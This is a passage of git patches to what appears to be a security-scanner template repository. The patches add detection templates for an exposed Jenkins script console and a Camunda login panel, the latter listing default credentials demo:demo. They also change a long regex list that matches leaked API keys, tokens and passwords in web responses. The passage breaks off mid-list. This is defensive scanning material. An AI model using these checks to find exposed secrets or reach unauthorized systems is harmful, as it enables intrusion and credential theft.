1297/4083] Create jenkins-script.yaml --- vulnerabilities/jenkins/jenkins-script.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 vulnerabilities/jenkins/jenkins-script.yaml diff --git a/vulnerabilities/jenkins/jenkins-script.yaml b/vulnerabilities/jenkins/jenkins-script.yaml new file mode 100644 index 0000000000..2e6b0f1256 --- /dev/null +++ b/vulnerabilities/jenkins/jenkins-script.yaml @@ -0,0 +1,21 @@ +id: jenkins-script + +info: + name: Jenkins RCE due to accesible script functionality + author: philippedelteil + severity: critical + reference: https://hackerone.com/reports/403402 + tags: jenkins,rce +requests: + - method: GET + path: + - "{{BaseURL}}/script/" + matchers-condition: and + matchers: + - type: word + words: + - "println(Jenkins.instance.pluginManager.plugins)" + part: body + - type: status + status: + - 200 From 4479539a0eca55afb937a00e337aee2aefc038b4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 23:02:10 +0530 Subject: [PATCH 1298/4083] Update cerebro-panel.yaml --- exposed-panels/cerebro-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/cerebro-panel.yaml b/exposed-panels/cerebro-panel.yaml index 3e4a438539..9e315b83e2 100644 --- a/exposed-panels/cerebro-panel.yaml +++ b/exposed-panels/cerebro-panel.yaml @@ -2,7 +2,7 @@ id: cerebro-panel info: name: Cerebro Panel - author: elder tao + author: huowuzhao,elder tao severity: high reference: https://github.com/lmenezes/cerebro tags: panel,cerebro From aff99ded076b1d90e58edec900e5c2b02160e43f Mon Sep 17 00:00:00 2001 From: Ali Fathi Ali Sawehli <55149010+alifathi-h1@users.noreply.github.com> Date: Fri, 30 Jul 2021 01:53:05 +0800 Subject: [PATCH 1299/4083] Create camunda-login-panel.yaml --- exposed-panels/camunda-login-panel.yaml | 31 +++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposed-panels/camunda-login-panel.yaml diff --git a/exposed-panels/camunda-login-panel.yaml b/exposed-panels/camunda-login-panel.yaml new file mode 100644 index 0000000000..762fd13c9e --- /dev/null +++ b/exposed-panels/camunda-login-panel.yaml @@ -0,0 +1,31 @@ +id: camunda-login-panel +info: + name: Camunda Login panel + author: alifathi-h1 + severity: info + description: Default Credentials of demo:demo on Camunda application. + reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/ + tags: camunda,panel + +requests: + - method: GET + path: + - '{{BaseURL}}/app/welcome/default/#!/login' + - '{{BaseURL}}/camunda/app/welcome/default/#!/login' + + matchers-condition: and + matchers: + + - type: word + words: + - "Camunda Welcome" + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '
    Date: Thu, 29 Jul 2021 14:08:41 -0500 Subject: [PATCH 1300/4083] Update credentials-disclosure.yaml I feel like we should make these regex case insensitive so they match unexpected variations. For example, the `api[_-]?key(=| =|:| :)` regex before my change would match `apikey :`, `api_key =` and `api-key:` but not `apiKey=`. --- .../generic/credentials-disclosure.yaml | 1375 +++++++++-------- 1 file changed, 688 insertions(+), 687 deletions(-) diff --git a/exposures/tokens/generic/credentials-disclosure.yaml b/exposures/tokens/generic/credentials-disclosure.yaml index b2d2154bf5..0670daecbc 100644 --- a/exposures/tokens/generic/credentials-disclosure.yaml +++ b/exposures/tokens/generic/credentials-disclosure.yaml @@ -26,690 +26,691 @@ requests: - type: regex part: body regex: - - "zopim[_-]?account[_-]?key(=| =|:| :)" - - "zhuliang[_-]?gh[_-]?token(=| =|:| :)" - - "zensonatypepassword(=| =|:| :)" - - "zendesk[_-]?travis[_-]?github(=| =|:| :)" - - "yt[_-]?server[_-]?api[_-]?key(=| =|:| :)" - - "yt[_-]?partner[_-]?refresh[_-]?token(=| =|:| :)" - - "yt[_-]?partner[_-]?client[_-]?secret(=| =|:| :)" - - "yt[_-]?client[_-]?secret(=| =|:| :)" - - "yt[_-]?api[_-]?key(=| =|:| :)" - - "yt[_-]?account[_-]?refresh[_-]?token(=| =|:| :)" - - "yt[_-]?account[_-]?client[_-]?secret(=| =|:| :)" - - "yangshun[_-]?gh[_-]?token(=| =|:| :)" - - "yangshun[_-]?gh[_-]?password(=| =|:| :)" - - "www[_-]?googleapis[_-]?com(=| =|:| :)" - - "wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :)" - - "wpt[_-]?ssh[_-]?connect(=| =|:| :)" - - "wpt[_-]?report[_-]?api[_-]?key(=| =|:| :)" - - "wpt[_-]?prepare[_-]?dir(=| =|:| :)" - - "wpt[_-]?db[_-]?user(=| =|:| :)" - - "wpt[_-]?db[_-]?password(=| =|:| :)" - - "wporg[_-]?password(=| =|:| :)" - - "wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key(=| =|:| :)" - - "wordpress[_-]?db[_-]?user(=| =|:| :)" - - "wordpress[_-]?db[_-]?password(=| =|:| :)" - - "wincert[_-]?password(=| =|:| :)" - - "widget[_-]?test[_-]?server(=| =|:| :)" - - "widget[_-]?fb[_-]?password[_-]?3(=| =|:| :)" - - "widget[_-]?fb[_-]?password[_-]?2(=| =|:| :)" - - "widget[_-]?fb[_-]?password(=| =|:| :)" - - "widget[_-]?basic[_-]?password[_-]?5(=| =|:| :)" - - "widget[_-]?basic[_-]?password[_-]?4(=| =|:| :)" - - "widget[_-]?basic[_-]?password[_-]?3(=| =|:| :)" - - "widget[_-]?basic[_-]?password[_-]?2(=| =|:| :)" - - "widget[_-]?basic[_-]?password(=| =|:| :)" - - "watson[_-]?password(=| =|:| :)" - - "watson[_-]?device[_-]?password(=| =|:| :)" - - "watson[_-]?conversation[_-]?password(=| =|:| :)" - - "wakatime[_-]?api[_-]?key(=| =|:| :)" - - "vscetoken(=| =|:| :)" - - "visual[_-]?recognition[_-]?api[_-]?key(=| =|:| :)" - - "virustotal[_-]?apikey(=| =|:| :)" - - "vip[_-]?github[_-]?deploy[_-]?key[_-]?pass(=| =|:| :)" - - "vip[_-]?github[_-]?deploy[_-]?key(=| =|:| :)" - - "vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key(=| =|:| :)" - - "v[_-]?sfdc[_-]?password(=| =|:| :)" - - "v[_-]?sfdc[_-]?client[_-]?secret(=| =|:| :)" - - "usertravis(=| =|:| :)" - - "user[_-]?assets[_-]?secret[_-]?access[_-]?key(=| =|:| :)" - - "user[_-]?assets[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "use[_-]?ssh(=| =|:| :)" - - "us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com(=| =|:| :)" - - "urban[_-]?secret(=| =|:| :)" - - "urban[_-]?master[_-]?secret(=| =|:| :)" - - "urban[_-]?key(=| =|:| :)" - - "unity[_-]?serial(=| =|:| :)" - - "unity[_-]?password(=| =|:| :)" - - "twitteroauthaccesstoken(=| =|:| :)" - - "twitteroauthaccesssecret(=| =|:| :)" - - "twitter[_-]?consumer[_-]?secret(=| =|:| :)" - - "twitter[_-]?consumer[_-]?key(=| =|:| :)" - - "twine[_-]?password(=| =|:| :)" - - "twilio[_-]?token(=| =|:| :)" - - "twilio[_-]?sid(=| =|:| :)" - - "twilio[_-]?configuration[_-]?sid(=| =|:| :)" - - "twilio[_-]?chat[_-]?account[_-]?api[_-]?service(=| =|:| :)" - - "twilio[_-]?api[_-]?secret(=| =|:| :)" - - "twilio[_-]?api[_-]?key(=| =|:| :)" - - "trex[_-]?okta[_-]?client[_-]?token(=| =|:| :)" - - "trex[_-]?client[_-]?token(=| =|:| :)" - - "travis[_-]?token(=| =|:| :)" - - "travis[_-]?secure[_-]?env[_-]?vars(=| =|:| :)" - - "travis[_-]?pull[_-]?request(=| =|:| :)" - - "travis[_-]?gh[_-]?token(=| =|:| :)" - - "travis[_-]?e2e[_-]?token(=| =|:| :)" - - "travis[_-]?com[_-]?token(=| =|:| :)" - - "travis[_-]?branch(=| =|:| :)" - - "travis[_-]?api[_-]?token(=| =|:| :)" - - "travis[_-]?access[_-]?token(=| =|:| :)" - - "token[_-]?core[_-]?java(=| =|:| :)" - - "thera[_-]?oss[_-]?access[_-]?key(=| =|:| :)" - - "tester[_-]?keys[_-]?password(=| =|:| :)" - - "test[_-]?test(=| =|:| :)" - - "test[_-]?github[_-]?token(=| =|:| :)" - - "tesco[_-]?api[_-]?key(=| =|:| :)" - - "svn[_-]?pass(=| =|:| :)" - - "surge[_-]?token(=| =|:| :)" - - "surge[_-]?login(=| =|:| :)" - - "stripe[_-]?public(=| =|:| :)" - - "stripe[_-]?private(=| =|:| :)" - - "strip[_-]?secret[_-]?key(=| =|:| :)" - - "strip[_-]?publishable[_-]?key(=| =|:| :)" - - "stormpath[_-]?api[_-]?key[_-]?secret(=| =|:| :)" - - "stormpath[_-]?api[_-]?key[_-]?id(=| =|:| :)" - - "starship[_-]?auth[_-]?token(=| =|:| :)" - - "starship[_-]?account[_-]?sid(=| =|:| :)" - - "star[_-]?test[_-]?secret[_-]?access[_-]?key(=| =|:| :)" - - "star[_-]?test[_-]?location(=| =|:| :)" - - "star[_-]?test[_-]?bucket(=| =|:| :)" - - "star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "staging[_-]?base[_-]?url[_-]?runscope(=| =|:| :)" - - "ssmtp[_-]?config(=| =|:| :)" - - "sshpass(=| =|:| :)" - - "srcclr[_-]?api[_-]?token(=| =|:| :)" - - "square[_-]?reader[_-]?sdk[_-]?repository[_-]?password(=| =|:| :)" - - "sqssecretkey(=| =|:| :)" - - "sqsaccesskey(=| =|:| :)" - - "spring[_-]?mail[_-]?password(=| =|:| :)" - - "spotify[_-]?api[_-]?client[_-]?secret(=| =|:| :)" - - "spotify[_-]?api[_-]?access[_-]?token(=| =|:| :)" - - "spaces[_-]?secret[_-]?access[_-]?key(=| =|:| :)" - - "spaces[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "soundcloud[_-]?password(=| =|:| :)" - - "soundcloud[_-]?client[_-]?secret(=| =|:| :)" - - "sonatypepassword(=| =|:| :)" - - "sonatype[_-]?token[_-]?user(=| =|:| :)" - - "sonatype[_-]?token[_-]?password(=| =|:| :)" - - "sonatype[_-]?password(=| =|:| :)" - - "sonatype[_-]?pass(=| =|:| :)" - - "sonatype[_-]?nexus[_-]?password(=| =|:| :)" - - "sonatype[_-]?gpg[_-]?passphrase(=| =|:| :)" - - "sonatype[_-]?gpg[_-]?key[_-]?name(=| =|:| :)" - - "sonar[_-]?token(=| =|:| :)" - - "sonar[_-]?project[_-]?key(=| =|:| :)" - - "sonar[_-]?organization[_-]?key(=| =|:| :)" - - "socrata[_-]?password(=| =|:| :)" - - "socrata[_-]?app[_-]?token(=| =|:| :)" - - "snyk[_-]?token(=| =|:| :)" - - "snyk[_-]?api[_-]?token(=| =|:| :)" - - "snoowrap[_-]?refresh[_-]?token(=| =|:| :)" - - "snoowrap[_-]?password(=| =|:| :)" - - "snoowrap[_-]?client[_-]?secret(=| =|:| :)" - - "slate[_-]?user[_-]?email(=| =|:| :)" - - "slash[_-]?developer[_-]?space[_-]?key(=| =|:| :)" - - "slash[_-]?developer[_-]?space(=| =|:| :)" - - "signing[_-]?key[_-]?sid(=| =|:| :)" - - "signing[_-]?key[_-]?secret(=| =|:| :)" - - "signing[_-]?key[_-]?password(=| =|:| :)" - - "signing[_-]?key(=| =|:| :)" - - "setsecretkey(=| =|:| :)" - - "setdstsecretkey(=| =|:| :)" - - "setdstaccesskey(=| =|:| :)" - - "ses[_-]?secret[_-]?key(=| =|:| :)" - - "ses[_-]?access[_-]?key(=| =|:| :)" - - "service[_-]?account[_-]?secret(=| =|:| :)" - - "sentry[_-]?key(=| =|:| :)" - - "sentry[_-]?endpoint(=| =|:| :)" - - "sentry[_-]?default[_-]?org(=| =|:| :)" - - "sentry[_-]?auth[_-]?token(=| =|:| :)" - - "sendwithus[_-]?key(=| =|:| :)" - - "sendgrid[_-]?username(=| =|:| :)" - - "sendgrid[_-]?user(=| =|:| :)" - - "sendgrid[_-]?password(=| =|:| :)" - - "sendgrid[_-]?key(=| =|:| :)" - - "sendgrid[_-]?api[_-]?key(=| =|:| :)" - - "sendgrid(=| =|:| :)" - - "selion[_-]?selenium[_-]?host(=| =|:| :)" - - "selion[_-]?log[_-]?level[_-]?dev(=| =|:| :)" - - "segment[_-]?api[_-]?key(=| =|:| :)" - - "secretkey(=| =|:| :)" - - "secretaccesskey(=| =|:| :)" - - "secret[_-]?key[_-]?base(=| =|:| :)" - - "secret[_-]?9(=| =|:| :)" - - "secret[_-]?8(=| =|:| :)" - - "secret[_-]?7(=| =|:| :)" - - "secret[_-]?6(=| =|:| :)" - - "secret[_-]?5(=| =|:| :)" - - "secret[_-]?4(=| =|:| :)" - - "secret[_-]?3(=| =|:| :)" - - "secret[_-]?2(=| =|:| :)" - - "secret[_-]?11(=| =|:| :)" - - "secret[_-]?10(=| =|:| :)" - - "secret[_-]?1(=| =|:| :)" - - "secret[_-]?0(=| =|:| :)" - - "sdr[_-]?token(=| =|:| :)" - - "scrutinizer[_-]?token(=| =|:| :)" - - "sauce[_-]?access[_-]?key(=| =|:| :)" - - "sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)" - - "sandbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "sandbox[_-]?access[_-]?token(=| =|:| :)" - - "salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token(=| =|:| :)" - - "salesforce[_-]?bulk[_-]?test[_-]?password(=| =|:| :)" - - "sacloud[_-]?api(=| =|:| :)" - - "sacloud[_-]?access[_-]?token[_-]?secret(=| =|:| :)" - - "sacloud[_-]?access[_-]?token(=| =|:| :)" - - "s3[_-]?user[_-]?secret(=| =|:| :)" - - "s3[_-]?secret[_-]?key(=| =|:| :)" - - "s3[_-]?secret[_-]?assets(=| =|:| :)" - - "s3[_-]?secret[_-]?app[_-]?logs(=| =|:| :)" - - "s3[_-]?key[_-]?assets(=| =|:| :)" - - "s3[_-]?key[_-]?app[_-]?logs(=| =|:| :)" - - "s3[_-]?key(=| =|:| :)" - - "s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com(=| =|:| :)" - - "s3[_-]?bucket[_-]?name[_-]?assets(=| =|:| :)" - - "s3[_-]?bucket[_-]?name[_-]?app[_-]?logs(=| =|:| :)" - - "s3[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "s3[_-]?access[_-]?key(=| =|:| :)" - - "rubygems[_-]?auth[_-]?token(=| =|:| :)" - - "rtd[_-]?store[_-]?pass(=| =|:| :)" - - "rtd[_-]?key[_-]?pass(=| =|:| :)" - - "route53[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "ropsten[_-]?private[_-]?key(=| =|:| :)" - - "rinkeby[_-]?private[_-]?key(=| =|:| :)" - - "rest[_-]?api[_-]?key(=| =|:| :)" - - "repotoken(=| =|:| :)" - - "reporting[_-]?webdav[_-]?url(=| =|:| :)" - - "reporting[_-]?webdav[_-]?pwd(=| =|:| :)" - - "release[_-]?token(=| =|:| :)" - - "release[_-]?gh[_-]?token(=| =|:| :)" - - "registry[_-]?secure(=| =|:| :)" - - "registry[_-]?pass(=| =|:| :)" - - "refresh[_-]?token(=| =|:| :)" - - "rediscloud[_-]?url(=| =|:| :)" - - "redis[_-]?stunnel[_-]?urls(=| =|:| :)" - - "randrmusicapiaccesstoken(=| =|:| :)" - - "rabbitmq[_-]?password(=| =|:| :)" - - "quip[_-]?token(=| =|:| :)" - - "qiita[_-]?token(=| =|:| :)" - - "pypi[_-]?passowrd(=| =|:| :)" - - "pushover[_-]?token(=| =|:| :)" - - "publish[_-]?secret(=| =|:| :)" - - "publish[_-]?key(=| =|:| :)" - - "publish[_-]?access(=| =|:| :)" - - "project[_-]?config(=| =|:| :)" - - "prod[_-]?secret[_-]?key(=| =|:| :)" - - "prod[_-]?password(=| =|:| :)" - - "prod[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "private[_-]?signing[_-]?password(=| =|:| :)" - - "pring[_-]?mail[_-]?username(=| =|:| :)" - - "preferred[_-]?username(=| =|:| :)" - - "prebuild[_-]?auth(=| =|:| :)" - - "postgresql[_-]?pass(=| =|:| :)" - - "postgresql[_-]?db(=| =|:| :)" - - "postgres[_-]?env[_-]?postgres[_-]?password(=| =|:| :)" - - "postgres[_-]?env[_-]?postgres[_-]?db(=| =|:| :)" - - "plugin[_-]?password(=| =|:| :)" - - "plotly[_-]?apikey(=| =|:| :)" - - "places[_-]?apikey(=| =|:| :)" - - "places[_-]?api[_-]?key(=| =|:| :)" - - "pg[_-]?host(=| =|:| :)" - - "pg[_-]?database(=| =|:| :)" - - "personal[_-]?secret(=| =|:| :)" - - "personal[_-]?key(=| =|:| :)" - - "percy[_-]?token(=| =|:| :)" - - "percy[_-]?project(=| =|:| :)" - - "paypal[_-]?client[_-]?secret(=| =|:| :)" - - "passwordtravis(=| =|:| :)" - - "parse[_-]?js[_-]?key(=| =|:| :)" - - "pagerduty[_-]?apikey(=| =|:| :)" - - "packagecloud[_-]?token(=| =|:| :)" - - "ossrh[_-]?username(=| =|:| :)" - - "ossrh[_-]?secret(=| =|:| :)" - - "ossrh[_-]?password(=| =|:| :)" - - "ossrh[_-]?pass(=| =|:| :)" - - "ossrh[_-]?jira[_-]?password(=| =|:| :)" - - "os[_-]?password(=| =|:| :)" - - "os[_-]?auth[_-]?url(=| =|:| :)" - - "org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :)" - - "org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :)" - - "openwhisk[_-]?key(=| =|:| :)" - - "open[_-]?whisk[_-]?key(=| =|:| :)" - - "onesignal[_-]?user[_-]?auth[_-]?key(=| =|:| :)" - - "onesignal[_-]?api[_-]?key(=| =|:| :)" - - "omise[_-]?skey(=| =|:| :)" - - "omise[_-]?pubkey(=| =|:| :)" - - "omise[_-]?pkey(=| =|:| :)" - - "omise[_-]?key(=| =|:| :)" - - "okta[_-]?oauth2[_-]?clientsecret(=| =|:| :)" - - "okta[_-]?oauth2[_-]?client[_-]?secret(=| =|:| :)" - - "okta[_-]?client[_-]?token(=| =|:| :)" - - "ofta[_-]?secret(=| =|:| :)" - - "ofta[_-]?region(=| =|:| :)" - - "ofta[_-]?key(=| =|:| :)" - - "octest[_-]?password(=| =|:| :)" - - "octest[_-]?app[_-]?username(=| =|:| :)" - - "octest[_-]?app[_-]?password(=| =|:| :)" - - "oc[_-]?pass(=| =|:| :)" - - "object[_-]?store[_-]?creds(=| =|:| :)" - - "object[_-]?store[_-]?bucket(=| =|:| :)" - - "object[_-]?storage[_-]?region[_-]?name(=| =|:| :)" - - "object[_-]?storage[_-]?password(=| =|:| :)" - - "oauth[_-]?token(=| =|:| :)" - - "numbers[_-]?service[_-]?pass(=| =|:| :)" - - "nuget[_-]?key(=| =|:| :)" - - "nuget[_-]?apikey(=| =|:| :)" - - "nuget[_-]?api[_-]?key(=| =|:| :)" - - "npm[_-]?token(=| =|:| :)" - - "npm[_-]?secret[_-]?key(=| =|:| :)" - - "npm[_-]?password(=| =|:| :)" - - "npm[_-]?email(=| =|:| :)" - - "npm[_-]?auth[_-]?token(=| =|:| :)" - - "npm[_-]?api[_-]?token(=| =|:| :)" - - "npm[_-]?api[_-]?key(=| =|:| :)" - - "now[_-]?token(=| =|:| :)" - - "non[_-]?token(=| =|:| :)" - - "node[_-]?pre[_-]?gyp[_-]?secretaccesskey(=| =|:| :)" - - "node[_-]?pre[_-]?gyp[_-]?github[_-]?token(=| =|:| :)" - - "node[_-]?pre[_-]?gyp[_-]?accesskeyid(=| =|:| :)" - - "node[_-]?env(=| =|:| :)" - - "ngrok[_-]?token(=| =|:| :)" - - "ngrok[_-]?auth[_-]?token(=| =|:| :)" - - "nexuspassword(=| =|:| :)" - - "nexus[_-]?password(=| =|:| :)" - - "new[_-]?relic[_-]?beta[_-]?token(=| =|:| :)" - - "netlify[_-]?api[_-]?key(=| =|:| :)" - - "nativeevents(=| =|:| :)" - - "mysqlsecret(=| =|:| :)" - - "mysqlmasteruser(=| =|:| :)" - - "mysql[_-]?username(=| =|:| :)" - - "mysql[_-]?user(=| =|:| :)" - - "mysql[_-]?root[_-]?password(=| =|:| :)" - - "mysql[_-]?password(=| =|:| :)" - - "mysql[_-]?hostname(=| =|:| :)" - - "mysql[_-]?database(=| =|:| :)" - - "my[_-]?secret[_-]?env(=| =|:| :)" - - "multi[_-]?workspace[_-]?sid(=| =|:| :)" - - "multi[_-]?workflow[_-]?sid(=| =|:| :)" - - "multi[_-]?disconnect[_-]?sid(=| =|:| :)" - - "multi[_-]?connect[_-]?sid(=| =|:| :)" - - "multi[_-]?bob[_-]?sid(=| =|:| :)" - - "minio[_-]?secret[_-]?key(=| =|:| :)" - - "minio[_-]?access[_-]?key(=| =|:| :)" - - "mile[_-]?zero[_-]?key(=| =|:| :)" - - "mh[_-]?password(=| =|:| :)" - - "mh[_-]?apikey(=| =|:| :)" - - "mg[_-]?public[_-]?api[_-]?key(=| =|:| :)" - - "mg[_-]?api[_-]?key(=| =|:| :)" - - "mapboxaccesstoken(=| =|:| :)" - - "mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)" - - "mapbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "mapbox[_-]?api[_-]?token(=| =|:| :)" - - "mapbox[_-]?access[_-]?token(=| =|:| :)" - - "manifest[_-]?app[_-]?url(=| =|:| :)" - - "manifest[_-]?app[_-]?token(=| =|:| :)" - - "mandrill[_-]?api[_-]?key(=| =|:| :)" - - "managementapiaccesstoken(=| =|:| :)" - - "management[_-]?token(=| =|:| :)" - - "manage[_-]?secret(=| =|:| :)" - - "manage[_-]?key(=| =|:| :)" - - "mailgun[_-]?secret[_-]?api[_-]?key(=| =|:| :)" - - "mailgun[_-]?pub[_-]?key(=| =|:| :)" - - "mailgun[_-]?pub[_-]?apikey(=| =|:| :)" - - "mailgun[_-]?priv[_-]?key(=| =|:| :)" - - "mailgun[_-]?password(=| =|:| :)" - - "mailgun[_-]?apikey(=| =|:| :)" - - "mailgun[_-]?api[_-]?key(=| =|:| :)" - - "mailer[_-]?password(=| =|:| :)" - - "mailchimp[_-]?key(=| =|:| :)" - - "mailchimp[_-]?api[_-]?key(=| =|:| :)" - - "mail[_-]?password(=| =|:| :)" - - "magento[_-]?password(=| =|:| :)" - - "magento[_-]?auth[_-]?username (=| =|:| :)" - - "magento[_-]?auth[_-]?password(=| =|:| :)" - - "lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password(=| =|:| :)" - - "lottie[_-]?upload[_-]?cert[_-]?key[_-]?password(=| =|:| :)" - - "lottie[_-]?s3[_-]?secret[_-]?key(=| =|:| :)" - - "lottie[_-]?happo[_-]?secret[_-]?key(=| =|:| :)" - - "lottie[_-]?happo[_-]?api[_-]?key(=| =|:| :)" - - "looker[_-]?test[_-]?runner[_-]?client[_-]?secret(=| =|:| :)" - - "ll[_-]?shared[_-]?key(=| =|:| :)" - - "ll[_-]?publish[_-]?url(=| =|:| :)" - - "linux[_-]?signing[_-]?key(=| =|:| :)" - - "linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key(=| =|:| :)" - - "lighthouse[_-]?api[_-]?key(=| =|:| :)" - - "lektor[_-]?deploy[_-]?username(=| =|:| :)" - - "lektor[_-]?deploy[_-]?password(=| =|:| :)" - - "leanplum[_-]?key(=| =|:| :)" - - "kxoltsn3vogdop92m(=| =|:| :)" - - "kubeconfig(=| =|:| :)" - - "kubecfg[_-]?s3[_-]?path(=| =|:| :)" - - "kovan[_-]?private[_-]?key(=| =|:| :)" - - "keystore[_-]?pass(=| =|:| :)" - - "kafka[_-]?rest[_-]?url(=| =|:| :)" - - "kafka[_-]?instance[_-]?name(=| =|:| :)" - - "kafka[_-]?admin[_-]?url(=| =|:| :)" - - "jwt[_-]?secret(=| =|:| :)" - - "jdbc:mysql(=| =|:| :)" - - "jdbc[_-]?host(=| =|:| :)" - - "jdbc[_-]?databaseurl(=| =|:| :)" - - "itest[_-]?gh[_-]?token(=| =|:| :)" - - "ios[_-]?docs[_-]?deploy[_-]?token(=| =|:| :)" - - "internal[_-]?secrets(=| =|:| :)" - - "integration[_-]?test[_-]?appid(=| =|:| :)" - - "integration[_-]?test[_-]?api[_-]?key(=| =|:| :)" - - "index[_-]?name(=| =|:| :)" - - "ij[_-]?repo[_-]?username(=| =|:| :)" - - "ij[_-]?repo[_-]?password(=| =|:| :)" - - "hub[_-]?dxia2[_-]?password(=| =|:| :)" - - "homebrew[_-]?github[_-]?api[_-]?token(=| =|:| :)" - - "hockeyapp[_-]?token(=| =|:| :)" - - "heroku[_-]?token(=| =|:| :)" - - "heroku[_-]?email(=| =|:| :)" - - "heroku[_-]?api[_-]?key(=| =|:| :)" - - "hb[_-]?codesign[_-]?key[_-]?pass(=| =|:| :)" - - "hb[_-]?codesign[_-]?gpg[_-]?pass(=| =|:| :)" - - "hab[_-]?key(=| =|:| :)" - - "hab[_-]?auth[_-]?token(=| =|:| :)" - - "grgit[_-]?user(=| =|:| :)" - - "gren[_-]?github[_-]?token(=| =|:| :)" - - "gradle[_-]?signing[_-]?password(=| =|:| :)" - - "gradle[_-]?signing[_-]?key[_-]?id(=| =|:| :)" - - "gradle[_-]?publish[_-]?secret(=| =|:| :)" - - "gradle[_-]?publish[_-]?key(=| =|:| :)" - - "gpg[_-]?secret[_-]?keys(=| =|:| :)" - - "gpg[_-]?private[_-]?key(=| =|:| :)" - - "gpg[_-]?passphrase(=| =|:| :)" - - "gpg[_-]?ownertrust(=| =|:| :)" - - "gpg[_-]?keyname(=| =|:| :)" - - "gpg[_-]?key[_-]?name(=| =|:| :)" - - "google[_-]?private[_-]?key(=| =|:| :)" - - "google[_-]?maps[_-]?api[_-]?key(=| =|:| :)" - - "google[_-]?client[_-]?secret(=| =|:| :)" - - "google[_-]?client[_-]?id(=| =|:| :)" - - "google[_-]?client[_-]?email(=| =|:| :)" - - "google[_-]?account[_-]?type(=| =|:| :)" - - "gogs[_-]?password(=| =|:| :)" - - "gitlab[_-]?user[_-]?email(=| =|:| :)" - - "github[_-]?tokens(=| =|:| :)" - - "github[_-]?token(=| =|:| :)" - - "github[_-]?repo(=| =|:| :)" - - "github[_-]?release[_-]?token(=| =|:| :)" - - "github[_-]?pwd(=| =|:| :)" - - "github[_-]?password(=| =|:| :)" - - "github[_-]?oauth[_-]?token(=| =|:| :)" - - "github[_-]?oauth(=| =|:| :)" - - "github[_-]?key(=| =|:| :)" - - "github[_-]?hunter[_-]?username(=| =|:| :)" - - "github[_-]?hunter[_-]?token(=| =|:| :)" - - "github[_-]?deployment[_-]?token(=| =|:| :)" - - "github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass(=| =|:| :)" - - "github[_-]?client[_-]?secret(=| =|:| :)" - - "github[_-]?auth[_-]?token(=| =|:| :)" - - "github[_-]?auth(=| =|:| :)" - - "github[_-]?api[_-]?token(=| =|:| :)" - - "github[_-]?api[_-]?key(=| =|:| :)" - - "github[_-]?access[_-]?token(=| =|:| :)" - - "git[_-]?token(=| =|:| :)" - - "git[_-]?name(=| =|:| :)" - - "git[_-]?email(=| =|:| :)" - - "git[_-]?committer[_-]?name(=| =|:| :)" - - "git[_-]?committer[_-]?email(=| =|:| :)" - - "git[_-]?author[_-]?name(=| =|:| :)" - - "git[_-]?author[_-]?email(=| =|:| :)" - - "ghost[_-]?api[_-]?key(=| =|:| :)" - - "ghb[_-]?token(=| =|:| :)" - - "gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)" - - "gh[_-]?token(=| =|:| :)" - - "gh[_-]?repo[_-]?token(=| =|:| :)" - - "gh[_-]?oauth[_-]?token(=| =|:| :)" - - "gh[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)" - - "gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)" - - "gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id(=| =|:| :)" - - "gh[_-]?next[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)" - - "gh[_-]?email(=| =|:| :)" - - "gh[_-]?api[_-]?key(=| =|:| :)" - - "gcs[_-]?bucket(=| =|:| :)" - - "gcr[_-]?password(=| =|:| :)" - - "gcloud[_-]?service[_-]?key(=| =|:| :)" - - "gcloud[_-]?project(=| =|:| :)" - - "gcloud[_-]?bucket(=| =|:| :)" - - "ftp[_-]?username(=| =|:| :)" - - "ftp[_-]?user(=| =|:| :)" - - "ftp[_-]?pw(=| =|:| :)" - - "ftp[_-]?password(=| =|:| :)" - - "ftp[_-]?login(=| =|:| :)" - - "ftp[_-]?host(=| =|:| :)" - - "fossa[_-]?api[_-]?key(=| =|:| :)" - - "flickr[_-]?api[_-]?secret(=| =|:| :)" - - "flickr[_-]?api[_-]?key(=| =|:| :)" - - "flask[_-]?secret[_-]?key(=| =|:| :)" - - "firefox[_-]?secret(=| =|:| :)" - - "firebase[_-]?token(=| =|:| :)" - - "firebase[_-]?project[_-]?develop(=| =|:| :)" - - "firebase[_-]?key(=| =|:| :)" - - "firebase[_-]?api[_-]?token(=| =|:| :)" - - "firebase[_-]?api[_-]?json(=| =|:| :)" - - "file[_-]?password(=| =|:| :)" - - "exp[_-]?password(=| =|:| :)" - - "eureka[_-]?awssecretkey(=| =|:| :)" - - "env[_-]?sonatype[_-]?password(=| =|:| :)" - - "env[_-]?secret[_-]?access[_-]?key(=| =|:| :)" - - "env[_-]?secret(=| =|:| :)" - - "env[_-]?key(=| =|:| :)" - - 